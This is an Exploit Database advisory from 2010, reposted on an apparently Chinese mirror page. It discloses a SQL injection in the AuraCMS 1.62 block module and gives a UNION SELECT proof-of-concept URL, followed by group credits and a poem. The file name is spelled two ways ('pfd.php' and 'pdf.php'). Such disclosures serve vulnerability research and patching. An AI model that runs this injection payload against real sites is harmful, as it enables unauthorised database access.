AuraCMS 1.62 – ‘pfd.php’ SQL Injection

• Exploit Database
• 12 阅读

• 作者： Don Tukulesto
  日期： 2010-11-22
• 类别：

  • webapps
  平台：

  • php
• 来源：https://www.exploit-db.com/exploits/15594/

• -----------------------------------------------------------------------
  AuraCMS (pfd.php) SQL Injection Vulnerability
  -----------------------------------------------------------------------
  Author		: Arianom (arianom@indonesiancoder.com)
  Homepage	: http://indonesiancoder.com
  Vendor		: http://www.auracms.org/
  Software	: AuraCMS Mod Block Statistik | http://iwan.or.id/download/lihat/1/2-1-6.html
  Version		: 1.62
  Date		: November 22, 2010
  -----------------------------------------------------------------------
  
  
  
  I.POC & Exploit
  -----------------------------------------------------------------------
  http://localhost/pdf.php?id=140+AND+1=2+UNION+SELECT+ind0nesianc0der,1,2,3,4,5,6,7
  
  II. Refrence
  -----------------------------------------------------------------------
  AuraCMS 1.62 (stat.php) Remote Code Execution Exploit: http://www.exploit-db.com/exploits/4933/
  
  III. Vendor patch
  -----------------------------------------------------------------------
  Currently manufacturers do not provide patches or upgrades.
  
  IV. Credits
  -----------------------------------------------------------------------
  Allahu Akbar
  INDONESIAN CODER ~ Kill-9 Crew ~ MC Crew 
  Don Tukulesto ~ kaMtiEz ~ ibl13z ~ N4ck0 ~ Yurakha ~ aN93l1c ~Mboys ~ Contrex ~n4KuLa_ 
  k4L0ng666 ~ Xr0b0t ~ kido ~ t3ll0 ~ cimpli ~ Pathloader
  
  V. Poem
  -----------------------------------------------------------------------
  Kami adalah manusia biasa yang gemar belajar.
  Kami suka mempelajari hal apa saja, termasuk sesuatu yang menurut orang lain aneh atau asing bagi mereka.
  Kami disini hanya ingin berbagi, bukan untuk bersaing.
  
  Indonesian Coder Family